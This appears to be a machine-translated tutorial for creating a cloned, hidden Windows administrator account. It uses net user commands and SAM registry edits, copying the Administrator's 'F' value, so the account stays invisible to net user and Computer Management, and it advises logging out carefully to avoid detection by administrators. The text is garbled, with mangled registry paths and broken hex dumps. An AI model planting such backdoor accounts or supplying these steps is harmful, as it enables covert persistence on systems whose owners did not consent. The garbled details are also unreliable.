Find the clone account on the server

Create InternetUser $ user first
C:> net user InternetUser $ password123/add
// Add $ at the end to make it invisible to the net user in the console.

Run regedt32.exe(region is not regedit.exe)
Find HKEY_LOCAL_MAICHINESAMSAM and click it. Then, in the menu "security"-> "permission", add the account or group you are currently logged on,

Check "permission"-> "Full Control"-> "allow", and then confirm.
(For example, we logged on with guest just now, but it is already in the administrators group. Therefore, we need to change the ADMINISTRATORS group to allow

Full control, and the following keys, Domains, accounts, and users must do this step by step. However, if the default group of the guest user is not changed

So that you can directly read local sam information.

Run regedit.exe
Open HKEY_LOCAL_MAICHINESAMSAMDomainsaccountuseramesInternetUser $
Check that the default key value is "0x3f1" and export it as follows:
HKEY_LOCAL_MAICHINESAMSAMDomainsaccountuseramesASPNET $ InternetUser $. reg
Hkey_local_machinesamsamdomainsaccountusers%3f1 is 3f1. reg
HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsers00001F4 is lf4.reg (the corresponding key of the Administrators)
Open lf4.reg in notepad and find the following "F" value. For example

"F" = hex: 02,00, 01,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,
, 20, 97, b7, 13, 99, 50, c2, 01, ff, 7f, 40, 6e, 9f, 50, c2, 01,
F4,
, 00, 00

Copy it, open 3f1. reg, find the value of "F", delete it, and paste the above section.
Open aspnet $. reg and copy the content.

[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesInternetUser $]
@ = Hex (3f1 ):

Go back to 3f1. reg and paste the above section to the end of the file. The final generated file content is as follows:
Windows Registry Editor Version 5.00

[Hkey_local_machinesamsamdomainsaccountusers%3f1]
"F" = hex: 02,00, 01,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,00, 00,
, 20, 97, b7, 13, 99, 50, c2, 01, ff, 7f, 40, 6e, 9f, 50, c2, 01,
F4,
, 00, 00
"V" = hex:, 00, d4, 02, 00, d4, 00, 1a, 00, 00,
00, f0, 00,00, 00,10, 00,00, 00,00, 00,00, 00,00, 01,00, 00,12, 00,00, 00,00, 00,00, 00,
,
, 00, 00, 00, 01,
,
, 00, 00, 00, 00, a8, 00, 2c, 00, 00,
08,00, 00,00, 01,00, 00,00, 34,01, 00,00, 14,00, 00,00, 00,00, 00,00, 48 ,01, 00,00, 14,
, 00, 00, 00, 5c, 00, 00, 00, 00, 00, 00,
, 00, b4, 00, 00, c4,
,
, 00, 02, c0, ff, 07, 0f, 01, 00, 00, 02,
, 00, 00, 00, 00, 1b, 01, 00, 00,
, 00, ff, 07, 0f,
, 18, 00, ff, 07, 0f, 00, 00,
, B4, b7, cd, 22, dd,
E8, e4, 1c, be, 04, 3e, 32, e8, 00, 00, 00, 02,
,
, 00, dc, 8f, 0b, 7a,
4c, 68,62, 97, a9, 52, 4b, 62,10, 5e, 37,62, d0, 63, 9b, 4f, dc, 8f, 0b, 7a, 4f, 53, a9,,
, 10, 5e, 37,62, 01,00, ff, ff, ff,
Ff, 88, d7, f1, 01,02, 00,00, 07,00, 00,00, 01,00, 01,00, db, 57, a2, 94, f8, 41,63,
Fa, 2c, 88, d7, f1, cd, 99, cf, 0d, 01,00, 01,00, a0, 05,70, 54, f3, 45, 3e, 4a, 64,95, ef, 6c,
37, f1, 02, cf, 01,00, 01,00, 01,00, 01,00

[HKEY_LOCAL_MACHINESAMSAMDomainsAccountUsersNamesInternetUser $]
@ = Hex (3f1 ):

Save and delete the InternetUser $ user
C:> net user InternetUser $/delete
Run regedit.exe to import the modified 3f1. reg file.
Start regedt32.exe and find HKEY_LOCAL_MAICHINESAMSAM. Then click "security"-> "permission" in the menu to delete the file.

The added user (for example, the guest just used, and changed the settings of the Administrators group, so it corresponds to the previous

The Group also needs to be changed, and the keys, Domains, accounts, and users under SAM must all do so step by step. However, if the default group of the guest user is not changed,

There is no need to be so troublesome here, level 1 ).
In this way, we have created an account InternetUser $ that is not visible in the console using net user and "Computer Management", but cannot be changed.

The password is displayed in "Computer Management" after you change the password. Note that you should log out every login (whether cloned or not,

Rather than close the window directly, otherwise it will be seen in "Terminal Service Manager", and the Administrator may find a problem when logging out after logging on.

, How can it be "deregistering InternetUser $ ..."!!!

This is how they behave.

You know, webmaster.

So you should know how to do it.